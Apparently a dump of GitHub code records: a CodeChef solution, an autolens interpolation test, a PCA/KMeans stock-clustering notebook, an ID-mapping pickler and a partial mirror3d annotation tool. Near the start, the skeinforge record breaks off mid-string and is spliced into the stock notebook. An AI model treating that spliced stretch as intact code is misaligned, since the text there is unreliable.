Y = 0\n moves = 0\n while X < Xf :\n P = int(math.sqrt(Y)) +1\n X = P\n if X > Xf :\n break\n Y += P**2\n moves += 1\n return moves\n\ntry :\n T = int(input())\nexcept :\n quit()\n\nfor test_case in range(T) :\n Xf = int(input())\n print(max_moves(Xf))\n","repo_name":"Subhash3/CodeChef","sub_path":"July_Cook_off/two_variables.py","file_name":"two_variables.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28827512004","text":"import grid_util\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport autolens as al \nimport os\n\ncurrent_dir, current_file_name = os.path.split(os.path.abspath(__file__))\n\n#test data-dpsi pairing\ngrid_data = al.Grid2D.uniform(shape_native=(100,100), pixel_scales=0.1, sub_size=1)\nxgrid_data = grid_data.native[:,:,1]\nygrid_data = grid_data.native[:,:,0]\nrgrid = np.sqrt(xgrid_data**2 + ygrid_data**2)\nannular_mask = (rgrid>4.0) #np.logical_or(rgrid<1.0, rgrid>4.0)\ngrid_obj = grid_util.SparseDpsiGrid(annular_mask, 0.1, shape_2d_dpsi=(50,50))\ngrid_obj.show_grid()\ndef test_func(xgrid, ygrid):\n return 2*xgrid + 3*ygrid\ndata_image2d_true = test_func(grid_obj.xgrid_data, grid_obj.ygrid_data)\ndpsi_image2d_true = test_func(grid_obj.xgrid_dpsi, grid_obj.ygrid_dpsi)\ndata_image1d_true = test_func(grid_obj.xgrid_data_1d, grid_obj.ygrid_data_1d)\ndpsi_image1d_true = test_func(grid_obj.xgrid_dpsi_1d, grid_obj.ygrid_dpsi_1d)\ndata_image2d_recover = np.zeros_like(data_image2d_true)\ndata_image2d_recover.reshape(-1)[grid_obj.indices_1d_data] = data_image1d_true[:] #should not use flatten() here!!!\ndpsi_image2d_recover = np.zeros_like(dpsi_image2d_true)\ndpsi_image2d_recover.reshape(-1)[grid_obj.indices_1d_dpsi] = dpsi_image1d_true[:]\ndata_image1d_map = np.matmul(grid_obj.map_matrix, dpsi_image1d_true) \ndata_image2d_map = np.zeros_like(data_image2d_true)\ndata_image2d_map.reshape(-1)[grid_obj.indices_1d_data] = data_image1d_map[:]\nplt.figure(figsize=(10,15))\nplt.subplot(321)\nplt.imshow(data_image2d_true, extent=grid_obj.image_bound)\nplt.colorbar(fraction=0.046, pad=0.04)\nplt.subplot(322)\nplt.imshow(dpsi_image2d_true, extent=grid_obj.image_bound)\nplt.colorbar(fraction=0.046, pad=0.04)\nplt.subplot(323)\nplt.imshow(data_image2d_recover, extent=grid_obj.image_bound)\nplt.colorbar(fraction=0.046, pad=0.04)\nplt.subplot(324)\nplt.imshow(dpsi_image2d_recover, extent=grid_obj.image_bound)\nplt.colorbar(fraction=0.046, pad=0.04)\nplt.subplot(325)\nplt.imshow(data_image2d_map, extent=grid_obj.image_bound)\nplt.colorbar(fraction=0.046, pad=0.04)\nplt.subplot(326)\nplt.imshow(data_image2d_map-data_image2d_recover, extent=grid_obj.image_bound)\nplt.colorbar(fraction=0.046, pad=0.04)\nplt.savefig(f'{current_dir}/png/itp_image.png')\nplt.close()","repo_name":"caoxiaoyue/potential_correction","sub_path":"api/grid/show_dpsi2data_interpol.py","file_name":"show_dpsi2data_interpol.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13770097287","text":"\"\"\"\nSquare path.\n\n\"\"\"\n\nfrom __future__ import absolute_import\n#Init has to be imported first because it has code to workaround the python bug where relative imports don't work if the module is imported as a main module.\nimport __init__\n\nfrom fabmetheus_utilities.geometry.creation import lineation\nfrom fabmetheus_utilities.geometry.geometry_utilities import evaluate\nfrom fabmetheus_utilities.vector3 import Vector3\nfrom fabmetheus_utilities import euclidean\nimport math\n\n\n__author__ = 'Enrique Perez (perez_enrique@yahoo.com)'\n__credits__ = 'Art of IllusionDataset Link https://drive.google.com/file/d/1pP0Rr83ri0voscgr95-YnVCBv6BYV22w/view
\n\n# ### Importing Modules\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nget_ipython().run_line_magic('matplotlib', 'inline')\nfrom sklearn.decomposition import PCA\nfrom sklearn.cluster import KMeans\nfrom datetime import datetime\n\n\n# ### Loading Data\n\n# In[2]:\n\n\n#Read CSV (comma-separated) file into DataFrame\ndata = pd.read_csv('data_stocks.csv')\n\n\n# ### Data Exploration\n\n# In[3]:\n\n\ndata.head() #Returns the first 5 rows of data dataframe\n\n\n# In[4]:\n\n\ndata.describe() #The summary statistics of the data dataframe\n\n\n# In[5]:\n\n\ndata.info() #Prints information about data DataFrame.\n\n\n# In[6]:\n\n\ndata.columns #Columns of data dataframe\n\n\n# In[7]:\n\n\ndata.shape #Return a tuple representing the dimensionality of data DataFrame.\n\n\n# In[8]:\n\n\ndata.isnull().values.any() #Check for any NA’s in the dataframe.\n\n\n# ### Data Visualization\n\n# #### Dropping DATE and SP500 columns ( For PCA and KMeans clustering )\n\n# In[9]:\n\n\ndata_new = data.copy() #Making a copy of the data dataframe\n\n\n# In[10]:\n\n\ndata_new.drop(['DATE', 'SP500'], axis=1, inplace = True) #Removing the Date and SP500 columns\n\n\n# In[11]:\n\n\ndata_new.head() #Returns the first 5 rows of data dataframe\n\n\n# In[12]:\n\n\ndata_new.shape #Return a tuple representing the dimensionality of data DataFrame.\n\n\n# In[13]:\n\n\ndata_new.columns #Return columns of data dataframe.\n\n\n# ### PCA\n\n# In[14]:\n\n\n#Creating an instance of PCA\npca = PCA(n_components=3)\n\n\n# In[15]:\n\n\n#Fitting the pca object\npca.fit(data_new)\n\n\n# In[16]:\n\n\n#Transforming the data_new dataframe\ndata_new_reduced = pca.transform(data_new)\n\n\n# In[17]:\n\n\ndata_new_reduced.shape #Return a tuple representing the dimensionality of data_new_reduced DataFrame.\n\n\n# In[18]:\n\n\ndata_new_reduced[:1].shape #Return a tuple representing the dimensionality of data_new_reduced dataframe's 1st row.\n\n\n# In[19]:\n\n\n#Scatter Plot\nplt.figure(figsize=(16,9))\nplt.scatter(data_new_reduced[:,0],data_new_reduced[:,1])\nplt.ylabel('PC1')\nplt.xlabel('PC2')\nplt.show()\n\n\n# ### KMeans Clustering\n\n# In[20]:\n\n\npca.explained_variance_ #Returns explained variance array\n\n\n# In[21]:\n\n\ndata_new_reduced #Transformed data_new dataframe\n\n\n# In[22]:\n\n\n#Finding k and intertia for KMeans clustering using elbow method\nk = []\ninertia = []\nfor i in range(1,20):\n k_means = KMeans(n_clusters = i)\n k_means.fit(data_new_reduced)\n k.append(i)\n inertia.append(k_means.inertia_)\n\n\n# In[23]:\n\n\ninertia #Inertia List Data\n\n\n# In[24]:\n\n\n#Plot to find number of clusters (Elbow Method)\nplt.figure(figsize=(16,9))\nplt.plot(k,inertia)\nplt.show()\n\n\n# In[25]:\n\n\n#Initializing and fitting KMeans\nkm = KMeans(n_clusters = 5)\nkm.fit(data_new)\n\n\n# In[26]:\n\n\n#Predicted values using KMeans\ny_predict = km.predict(data_new)\n\n\n# In[27]:\n\n\n#Scatter Plot\nx = data_new_reduced[:,0]\ny = data_new_reduced[:,1]\nplt.figure(figsize=(16,9))\nplt.scatter(x, y, c = y_predict, alpha=0.5)\nplt.show()\n\n\n# In[28]:\n\n\n#Adding 'Y_PREDICT' column in data_new dataframe\ndata_new['Y_PREDICT'] = y_predict\n\n\n# In[29]:\n\n\ndata_new.head() #Returns the first 5 rows of data_new dataframe\n\n\n# In[30]:\n\n\n#Returns 'Y_PREDICT' column containing counts of unique values in data_new dataframe.\ndata_new['Y_PREDICT'].value_counts()\n\n\n# ### Problem 1 \n\n# In[31]:\n\n\n#Read CSV (comma-separated) file into DataFrame\nstocks= pd.read_csv('data_stocks.csv')\n\n\n# In[32]:\n\n\nstocks.head() #Returns the first 5 rows of stocks dataframe\n\n\n# In[33]:\n\n\n#Adding a new column 'NEW_DATE' in stocks dataframe \nstocks['NEW_DATE'] = pd.to_datetime(stocks['DATE'],unit='s')\n\n\n# In[34]:\n\n\ncols = stocks.columns.tolist() #Creating a list of columns from stocks dataframe\n\n\n# In[35]:\n\n\ncols = cols[-1:] + cols[:-1] #Making 'NEW_DATE' as first column\n\n\n# In[36]:\n\n\ncols #cols list data\n\n\n# In[37]:\n\n\n#Removing 'DATE' and 'SP500' columns\ncols.remove('DATE')\ncols.remove('SP500')\n\n\n# In[38]:\n\n\ncols #cols list data\n\n\n# In[39]:\n\n\nstocks.drop(columns=['DATE','SP500'],axis=1,inplace=True) #Removing 'DATE' and 'SP500' from stocks dataframe\n\n\n# In[40]:\n\n\nstocks.head() #Returns the first 5 rows of stocks dataframe\n\n\n# In[41]:\n\n\ndf = stocks[cols] #Creating a df objects which has cols list column data from stocks dataframe\n\n\n# In[42]:\n\n\ndf.head() #Returns the first 5 rows of df dataframe\n\n\n# In[43]:\n\n\ndf.shape #Return a tuple representing the dimensionality of df DataFrame.\n\n\n# In[44]:\n\n\n#Setting NEW_DATE as index \ndf.set_index('NEW_DATE',inplace=True)\n\n\n# In[45]:\n\n\ndf.head() #Returns the first 5 rows of df dataframe\n\n\n# In[46]:\n\n\ndf_transpose = df.transpose() #Creating transpose of the df dataframe\n\n\n# In[47]:\n\n\ndf_transpose.head() #Returns the first 5 rows of df_transpose dataframe\n\n\n# In[48]:\n\n\n#Creating an instance of PCA\npca_new = PCA(n_components=3)\n\n\n# In[49]:\n\n\n#Fitting and tranforming the df_transpose dataframe\ndf_transpose_reduced = pca_new.fit_transform(df_transpose)\n\n\n# In[50]:\n\n\ndf_transpose_reduced.shape #Return a tuple representing the dimensionality of df_transpose_reduced DataFrame.\n\n\n# In[51]:\n\n\n#Scatter Plot\nplt.figure(figsize=(16,9))\nplt.scatter(df_transpose_reduced[:,0],df_transpose_reduced[:,1])\nplt.ylabel('PC1')\nplt.xlabel('PC2')\nplt.show()\n\n\n# In[52]:\n\n\n#Returns explained variance array\npca_new.explained_variance_\n\n\n# In[53]:\n\n\n#Finding k_new and intertia_new list data for KMeans clustering using elbow method\nk_new = []\ninertia_new = []\nfor i in range(2,10):\n km_new=KMeans(n_clusters=i)\n km_new.fit(df_transpose)\n k_new.append(i)\n inertia_new.append(km_new.inertia_)\n\n\n# In[54]:\n\n\ninertia_new #inertia_new list data\n\n\n# In[55]:\n\n\n#Plot to find number of clusters (Elbow Method)\nplt.figure(figsize=(16,9))\nplt.plot(k_new,inertia_new)\nplt.show()\n\n\n# In[56]:\n\n\n#Initializing and fitting KMeans\nkm = KMeans(n_clusters = 6)\nkm.fit(df_transpose)\n\n\n# In[57]:\n\n\n#Predicted values using KMeans\ny_predict_new = km.predict(df_transpose)\n\n\n# In[58]:\n\n\n#Scatter Plot\nplt.figure(figsize=(16,9))\nplt.scatter(df_transpose_reduced[:,0],df_transpose_reduced[:,1],c=y_predict_new)\nplt.show()\n\n\n# In[59]:\n\n\n#Adding 'y_predict_new' values in df_transpose dataframe creating 'Y_PREDICT' column\ndf_transpose['Y_PREDICT'] = y_predict_new\n\n\n# In[60]:\n\n\n#Returns 'Y_PREDICT' column containing counts of unique values in df_transpose dataframe.\ndf_transpose['Y_PREDICT'].value_counts()\n\n\n# In[61]:\n\n\ndf_transpose.head() #Returns the first 5 rows of df_transpose dataframe\n\n\n# In[62]:\n\n\n#Apparently similar performing stocks of Type-1 are following:\ndf_transpose.loc[df_transpose['Y_PREDICT']==0]\n\n\n# In[63]:\n\n\n#Apparently similar performing stocks of Type-2 are following:\ndf_transpose.loc[df_transpose['Y_PREDICT']==1]\n\n\n# In[64]:\n\n\n#Apparently similar performing stocks of Type-3 are following:\ndf_transpose.loc[df_transpose['Y_PREDICT']==2]\n\n\n# In[65]:\n\n\n#Apparently similar performing stocks of Type-4 are following:\ndf_transpose.loc[df_transpose['Y_PREDICT']==3]\n\n\n# In[66]:\n\n\n#Apparently similar performing stocks of Type-5 are following:\ndf_transpose.loc[df_transpose['Y_PREDICT']==4]\n\n\n# In[67]:\n\n\n#Apparently similar performing stocks of Type-6 are following:\ndf_transpose.loc[df_transpose['Y_PREDICT']==5]\n\n\n# ## Problem 2:\n# ### How many Unique patterns that exist in the historical stock data set, based on fluctuations in price.\n\n# In[68]:\n\n\n#There are 5 unique patterns that exists in historical stock data set, based on fluctuation in price ( Observed Using KMeans Clustering Elbow Method )\n#Pattern-1 stocks (based on fluctuations in price):\ndata_new.loc[data_new['Y_PREDICT']==0]\n\n\n# In[69]:\n\n\n#Pattern-2 stocks (based on fluctuations in price):\ndata_new.loc[data_new['Y_PREDICT']==1]\n\n\n# In[70]:\n\n\n#Pattern-3 stocks (based on fluctuations in price):\ndata_new.loc[data_new['Y_PREDICT']==2]\n\n\n# In[71]:\n\n\n#Pattern-4 stocks (based on fluctuations in price):\ndata_new.loc[data_new['Y_PREDICT']==3]\n\n\n# In[72]:\n\n\n#Pattern-5 stocks (based on fluctuations in price):\ndata_new.loc[data_new['Y_PREDICT']==4]\n\n\n# # Problem 3:\n\n# ### Identify which all stocks are moving together and which all stocks are different from each other.\n\n# In[73]:\n\n\ndf_new = pd.read_csv('data_stocks.csv') #Read CSV (comma-separated) file into DataFrame\n\n\n# In[74]:\n\n\ndf_new.head() #Returns the first 5 rows of df_new dataframe\n\n\n# In[75]:\n\n\ndf_new.shape #Returns a tuple representing the dimensionality of df_new dataframe.\n\n\n# In[76]:\n\n\n#Removing 'DATE' and 'SP500' columns from df_new dataframe\ndf_new.drop(columns=['DATE','SP500'],inplace=True,axis=1)\n\n\n# In[77]:\n\n\n#Listing all the df_new dataframe columns\ncategory_cols = df_new.columns\n\n\n# In[78]:\n\n\n#Creating the columns with the difference of the previous row \nfor cat in category_cols:\n df_new[\"DIFF_\"+ cat] = df_new[cat] - df_new[cat].shift(periods=1)\n\n\n# In[79]:\n\n\ndf_new.shape #Returns a tuple representing the dimensionality of df_new dataframe.\n\n\n# In[80]:\n\n\ndf_new.drop(category_cols,axis=1,inplace=True) #Removing the category_cols list columns from df_new dataframe\n\n\n# In[81]:\n\n\ndf_new.shape #Returns a tuple representing the dimensionality of df_new dataframe.\n\n\n# In[82]:\n\n\ndf_new.head() #Returns the first 5 rows of df_new dataframe\n\n\n# In[83]:\n\n\n#Removing the rows which containd NaN\ndf_new.dropna(inplace=True)\n\n\n# In[84]:\n\n\ndf_new.head() #Returns the first 5 rows of df_new dataframe\n\n\n# In[85]:\n\n\ndf_new_corr = df_new.corr() #Computes pairwise correlation of columns of df_new dataframe\n\n\n# In[86]:\n\n\ndf_new_corr #Pairwise correlation dataframe of columns of df_new dataframe\n\n","repo_name":"mayurmorin/stocks-k-MEANS-PCA","sub_path":"Project - 4.py","file_name":"Project - 4.py","file_ext":"py","file_size_in_byte":9670,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"2967170264","text":"import csv\nimport os\nimport pickle\nfrom collections import defaultdict\n\n\ndef load_msu_to_entrez(msu_to_entrez_dict, id_file):\n with open(id_file) as f:\n csv_reader = csv.reader(f, delimiter=',')\n next(csv_reader) # Skip header\n for line in csv_reader:\n msu = line[-1]\n entrez = line[1]\n\n if msu != '-':\n msu_to_entrez_dict[msu].add(entrez)\n\n print(\"Finished mapping MSU accessions to Entrez IDs\")\n\n\ndef save_msu_entrez_mapping(msu_to_entrez_dict, output_dir):\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n with open(f'{output_dir}/msu-to-entrez-id.pickle', 'wb') as handle:\n pickle.dump(msu_to_entrez_dict, handle,\n protocol=pickle.HIGHEST_PROTOCOL)\n\n print(f'Generated {output_dir}/msu-to-entrez-id.pickle')\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n 'msu_to_entrez_file', help='text file mapping MSU accessions to Entrez IDs')\n parser.add_argument(\n 'output_dir', help='output directory for the pickled dictionary mapping MSU accessions to their respective Entrez IDs')\n\n args = parser.parse_args()\n\n msu_to_entrez_dict = defaultdict(set)\n load_msu_to_entrez(msu_to_entrez_dict, args.msu_to_entrez_file)\n save_msu_entrez_mapping(msu_to_entrez_dict, args.output_dir)\n","repo_name":"bioinfodlsu/rice-pilaf","sub_path":"prepare_data/workflow/scripts/enrichment_analysis/util/msu-to-entrez-id.py","file_name":"msu-to-entrez-id.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17857280501","text":"import numpy as np\nimport cv2\nimport argparse\nimport os\nimport matplotlib.pyplot as plt\nimport random\nimport time\nimport bs4\nfrom skimage import io\nfrom mirror3d.utils.general_utils import *\nfrom mirror3d.utils.algorithm import *\nfrom mirror3d.utils.plane_pcd_utils import *\nfrom PIL import ImageColor\n\n\nclass PlaneAnnotationTool:\n def __init__(self, process_index=0, multi_processing=False, overwrite=True):\n self.process_index = process_index\n self.multi_processing = multi_processing\n self.overwrite = overwrite\n\n def get_list_to_process(self, full_list):\n full_list.sort()\n if self.multi_processing:\n return full_list[self.process_index:self.process_index + 1]\n else:\n return full_list\n\n def set_show_plane(self, show_plane):\n \"\"\"\n For plane annotation: show the mesh plane during annotation or not\n Suggest to show the mesh plane if computer allows\n \"\"\"\n self.show_plane = show_plane\n\n def gen_color_mask_from_int_mask(self, int_mask_color_mask_txt):\n random.seed(5)\n rand = lambda: random.randint(100, 255)\n bgr_color_list = []\n for i in range(100):\n bgr_color_list.append([rand(), rand(), rand()])\n process_list = self.get_list_to_process(read_txt(int_mask_color_mask_txt))\n for item in process_list:\n if len(item.strip().split()) == 2:\n int_mask_path, color_mask_output_path = item.strip().split()\n os.makedirs(os.path.split(color_mask_output_path)[0], exist_ok=True)\n int_mask = cv2.imread(int_mask_path, cv2.IMREAD_ANYDEPTH)\n height, width = int_mask.shape\n color_mask = np.zeros((height, width, 3))\n for id in np.unique(int_mask):\n if id == 0:\n continue # background\n color_mask[np.where(int_mask == id)] = bgr_color_list[\n id - 1] # instance id in int_mask start from 1\n cv2.imwrite(color_mask_output_path, color_mask)\n print(\"RGB instance mask saved to :\", color_mask_output_path)\n\n def gen_int_mask_color_mask(self, coco_json, filename_int_mask_color_mask_txt, coco_filename_tag=\"file_name\"):\n from pycocotools.coco import COCO\n random.seed(5)\n rand = lambda: random.randint(100, 255)\n bgr_color_list = []\n for i in range(100):\n bgr_color_list.append([rand(), rand(), rand()])\n # Get filename int_mask_output_path, color_mask_output_path dict()\n filename_int_mask_color_mask_list = read_txt(filename_int_mask_color_mask_txt)\n color_output_paths = dict()\n for item in filename_int_mask_color_mask_list:\n if len(item.strip().split()) == 3:\n color_name, int_mask_output_path, color_mask_output_path = item.strip().split()\n color_output_paths[color_name] = [int_mask_output_path, color_mask_output_path]\n\n to_gen_list = [i[coco_filename_tag] for i in read_json(coco_json)[\"images\"]]\n to_gen_list = self.get_list_to_process(to_gen_list)\n\n coco = COCO(coco_json)\n for index in range(len(coco.imgs)):\n img_id = index + 1 # coco image id start from 1\n ann_ids = coco.getAnnIds(imgIds=img_id)\n anns = coco.loadAnns(ann_ids)\n img_info = coco.loadImgs(img_id)[0]\n int_mask_output_path, color_mask_output_path = color_output_paths[img_info[coco_filename_tag]]\n os.makedirs(os.path.split(int_mask_output_path)[0], exist_ok=True)\n os.makedirs(os.path.split(color_mask_output_path)[0], exist_ok=True)\n int_mask = np.zeros((img_info['height'], img_info['width']))\n color_mask = np.zeros((img_info['height'], img_info['width'], 3))\n for i, ann in enumerate(anns):\n int_mask = coco.annToMask(ann)\n int_mask += (int_mask * (i + 1)) # instance id in int_mask start from 1\n color_mask[np.where(int_mask != 0)] = bgr_color_list[i]\n cv2.imwrite(int_mask_output_path, int_mask.astype(np.uint16))\n cv2.imwrite(color_mask_output_path, color_mask)\n\n def update_plane_info_from_depth(self, mask_depth_jsonpath_txt):\n process_list = self.get_list_to_process(read_txt(mask_depth_jsonpath_txt))\n for item in process_list:\n if len(item.strip().split()) == 4:\n mask_path, depth_path, json_save_path, f = item.strip().split()\n f = self.get_and_check_focal_length(f, item)\n mask = cv2.imread(mask_path, cv2.IMREAD_ANYDEPTH)\n img_info = []\n for instance_index in np.unique(mask):\n if instance_index == 0:\n continue\n binary_instance_mask = (mask == instance_index).astype(np.uint8)\n mirror_points = (get_points_in_mask(f, depth_path, mirror_mask=binary_instance_mask))\n plane_parameter = get_mirror_parameter_from_xyzs_by_ransac(mirror_points)\n one_info = dict()\n one_info[\"plane\"] = list(plane_parameter)\n one_info[\"normal\"] = list(unit_vector(list(plane_parameter[:-1])))\n one_info[\"mask_id\"] = int(instance_index)\n img_info.append(one_info)\n os.makedirs(os.path.split(json_save_path)[0], exist_ok=True)\n save_json(json_save_path, img_info)\n\n def anno_env_setup(self, input_txt, border_width=25):\n \"\"\"\n Generate pcd for annotation and initlize plane parameter using ransac\n \n Output:\n pointclouds : .ply file (per instance).\n mirror plane information : .json file (per image); save mirror instances' parameter. \n color image with a mirror border mask : .png file (per instance).\n \"\"\"\n\n def gen_pcd(color_img_path, depth_img_path, mask_img_path, pcd_output_folder, plane_parameter_output_path,\n mirror_border_vis_output_folder, f):\n os.makedirs(mirror_border_vis_output_folder, exist_ok=True)\n os.makedirs(pcd_output_folder, exist_ok=True)\n os.makedirs(os.path.split(plane_parameter_output_path)[0], exist_ok=True)\n int_mask = cv2.imread(mask_img_path, cv2.IMREAD_ANYDEPTH)\n for instance_index in np.unique(int_mask):\n if instance_index == 0: # background\n continue\n file_save_name = os.path.split(color_img_path)[-1].split(\".\")[0] + \"_idx_\" + str(instance_index)\n pcd_save_path = os.path.join(pcd_output_folder, \"{}.ply\".format(file_save_name))\n if os.path.isfile(pcd_save_path) and not self.overwrite:\n print(pcd_save_path, \"exist! continue\")\n continue\n else:\n if os.path.exists(pcd_save_path):\n print(\"begin to overwrite {}\".format(pcd_save_path))\n else:\n print(\"generating pcd {}\".format(pcd_save_path))\n binary_instance_mask = (int_mask == instance_index).astype(np.uint8)\n mirror_border_mask = cv2.dilate(binary_instance_mask, cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (\n border_width, border_width))) - binary_instance_mask\n\n # Save image with masked mirror border\n border_mask_vis_image = visualize_mask_one_image(color_img_path, mirror_border_mask)\n border_mask_vis_output_path = os.path.join(mirror_border_vis_output_folder,\n \"{}.jpg\".format(file_save_name))\n plt.imsave(border_mask_vis_output_path, border_mask_vis_image)\n print(\"border_mask_vis_output_path : \", os.path.abspath(border_mask_vis_output_path))\n\n # Get pcd with refined mirror depth by ransac \n pcd, plane_parameter = refine_pcd_by_mirror_border(binary_instance_mask, mirror_border_mask,\n depth_img_path, color_img_path, f)\n update_plane_parameter_json(plane_parameter, plane_parameter_output_path, instance_index)\n print(\"plane_parameter saved to :\", os.path.abspath(plane_parameter_output_path))\n\n o3d.io.write_point_cloud(pcd_save_path, pcd)\n print(\"point cloud saved to :\", os.path.abspath(pcd_save_path))\n\n import open3d as o3d\n process_list = self.get_list_to_process(read_txt(input_txt))\n for item in process_list:\n if len(item.strip().split()) == 7:\n color_img_path, depth_img_path, mask_img_path, pcd_output_folder, \\\n plane_parameter_output_path, mirror_border_vis_output_folder, f = item.strip().split()\n f = self.get_and_check_focal_length(f, item)\n\n if not os.path.exists(color_img_path) or not os.path.exists(depth_img_path) or not os.path.exists(\n mask_img_path):\n print(\"invalid line : \", item)\n print(\"input txt format: [input color image path] [input depth image path] [input integer mask \"\n \"path] [pointcloud output folder(pointcloud's name will be color image name + instance id)] \"\n \"[plane parameter JSON output path] [folder to save color image with mirror border mask] [\"\n \"focal length of this sample]\")\n\n gen_pcd(color_img_path, depth_img_path, mask_img_path, pcd_output_folder, plane_parameter_output_path,\n mirror_border_vis_output_folder, f)\n\n def save_progress(self, annotation_progress_save_folder):\n \"\"\"Save annotation progress\"\"\"\n error_txt_path = os.path.join(annotation_progress_save_folder, \"error_pcd_list.txt\")\n correct_txt_path = os.path.join(annotation_progress_save_folder, \"correct_pcd_list.txt\")\n save_txt(error_txt_path, set([item for item in self.error_pcd_list]))\n save_txt(correct_txt_path, set([item for item in self.correct_pcd_list]))\n\n def get_progress(self, input_txt, annotation_progress_save_folder):\n \"\"\"Get annotation progress\"\"\"\n self.anno_info_list = []\n self.to_anno_sample_index = 0\n process_list = read_txt(input_txt)\n for item in process_list:\n if len(item.strip().split()) == 7:\n color_img_path, depth_img_path, mask_path, pcd_path, \\\n plane_parameter_output_path, mirror_border_vis_path, f = item.strip().split()\n if not os.path.exists(pcd_path) or not os.path.exists(mirror_border_vis_path) or not os.path.exists(\n color_img_path) or not os.path.exists(depth_img_path) or not os.path.exists(mask_path):\n print(\"invalid line : \", item)\n exit()\n else:\n self.anno_info_list.append(\n [color_img_path, depth_img_path, mask_path, pcd_path, plane_parameter_output_path,\n mirror_border_vis_path, int(f)])\n\n self.anno_info_list.sort()\n error_txt = os.path.join(annotation_progress_save_folder, \"error_pcd_list.txt\")\n correct_txt = os.path.join(annotation_progress_save_folder, \"correct_pcd_list.txt\")\n\n # get error list\n if os.path.exists(error_txt):\n self.error_pcd_list = read_txt(error_txt)\n else:\n self.error_pcd_list = []\n\n # get correct list\n if os.path.exists(correct_txt):\n self.correct_pcd_list = read_txt(correct_txt)\n else:\n self.correct_pcd_list = []\n\n # get error list (regardless of instance id)\n self.error_sample = []\n for item in self.error_pcd_list:\n self.error_sample.append(item.split(\"_idx_\")[0])\n\n # get annotation start position\n for index, info in enumerate(self.anno_info_list):\n one_path = info[3] # get pcd path\n if one_path not in self.correct_pcd_list and one_path not in self.error_pcd_list:\n self.to_anno_sample_index = index\n return\n self.to_anno_sample_index = len(self.anno_info_list)\n return\n\n def anno_plane_update_imgInfo(self, annotation_progress_save_folder, input_txt):\n \"\"\"\n Plane annotation \n\n Requirement : open3d 0.10.0 +\n \"\"\"\n import open3d as o3d\n import warnings\n warnings.filterwarnings(\"ignore\")\n os.makedirs(annotation_progress_save_folder, exist_ok=True)\n\n self.get_progress(input_txt, annotation_progress_save_folder)\n annotation_start_index = self.to_anno_sample_index # self.to_anno_sample_index start from 0\n manual_adjust_num = 0 # count statistic\n annotation_start_time = time.time()\n while 1:\n if self.to_anno_sample_index == len(self.anno_info_list):\n print(\"annotation finished ! XD\")\n exit(1)\n color_img_path, depth_img_path, mask_path, current_pcd_path, \\\n plane_parameter_output_path, mirror_border_vis_path, f = self.anno_info_list[self.to_anno_sample_index]\n current_pcd_id = current_pcd_path.split(\"_idx_\")[0]\n mirror_plane = []\n\n # If one instance in the sample is negative; then this sample is invalid\n if current_pcd_id in self.error_sample:\n self.error_pcd_list.append(current_pcd_path)\n self.save_progress(annotation_progress_save_folder)\n self.get_progress(input_txt, annotation_progress_save_folder)\n print(\"[AUTO] sample index {} path {} is invalid\".format(self.to_anno_sample_index, current_pcd_path))\n continue\n\n # print the current annotation tag for the sample\n current_sample_status = \"N/A\"\n if current_pcd_path in self.correct_pcd_list:\n current_sample_status = \"correct\"\n elif current_pcd_path in self.error_pcd_list:\n current_sample_status = \"error\"\n print(\"###################### sample status {} ######################\".format(current_sample_status))\n\n # get the pcd for annotation\n pcd = o3d.io.read_point_cloud(current_pcd_path)\n instance_id = int(current_pcd_path.split(\"_idx_\")[-1].split(\".\")[0])\n plane_parameter = read_plane_json(plane_parameter_output_path)[instance_id][\"plane_parameter\"]\n print(\"sample index {} mirror to annotate {}\".format(self.to_anno_sample_index, mirror_border_vis_path))\n\n # show the point cloud and mesh plane (optional) in the user interface\n if self.show_plane:\n try:\n instance_mask = (cv2.imread(mask_path, cv2.IMREAD_ANYDEPTH) == instance_id).astype(np.uint8)\n mirror_points = get_points_in_mask(f=self.f, depth_img_path=depth_img_path,\n color_img_path=color_img_path, mirror_mask=instance_mask)\n mirror_pcd = o3d.geometry.PointCloud()\n mirror_pcd.points = o3d.utility.Vector3dVector(np.stack(mirror_points, axis=0))\n mirror_bbox = o3d.geometry.OrientedBoundingBox.create_from_points(\n o3d.utility.Vector3dVector(np.stack(mirror_points, axis=0)))\n except:\n print(\"warning : can not generate mesh plane\")\n if self.show_plane:\n try:\n mirror_plane = get_mirror_init_plane_from_mirrorbbox(plane_parameter, mirror_bbox)\n o3d.visualization.draw_geometries([pcd, mirror_plane])\n except:\n o3d.visualization.draw_geometries([pcd])\n else:\n o3d.visualization.draw_geometries([pcd])\n\n option_list = ToolOption()\n option_list.add_option(\"t\", \"TRUE : initial plane parameter is correct\")\n option_list.add_option(\"w\", \"WASTE : sample have error, can not be used (e.g. point cloud too noisy)\")\n option_list.add_option(\"back n\", \"BACK : return n times (e.g. back 3 : give up the recent 3 annotated \"\n \"sample and go back)\")\n option_list.add_option(\"goto n\", \"GOTO : goto the n th image (e.g. goto 3 : go to the third image\")\n option_list.add_option(\"n\", \"NEXT : goto next image without annotation\")\n option_list.add_option(\"a\", \"ADJUST: adjust one sample repeatedly\")\n option_list.add_option(\"exit\", \"EXIT : save and exit\")\n option_list.print_option()\n input_option = input()\n\n if not option_list.is_input_key_valid(input_option):\n print(\"invalid input, please input again :D\")\n continue\n\n if input_option == \"t\":\n if current_pcd_path in self.error_pcd_list:\n self.error_pcd_list.remove(current_pcd_path)\n self.correct_pcd_list.append(current_pcd_path)\n self.save_progress(annotation_progress_save_folder)\n self.get_progress(input_txt, annotation_progress_save_folder)\n\n elif input_option == \"w\":\n if current_pcd_path in self.correct_pcd_list:\n self.correct_pcd_list.remove(current_pcd_path)\n self.error_pcd_list.append(current_pcd_path)\n self.save_progress(annotation_progress_save_folder)\n self.get_progress(input_txt, annotation_progress_save_folder)\n elif input_option == \"n\":\n if current_sample_status == \"N/A\":\n print(\"please annotate current sample :-)\")\n continue\n 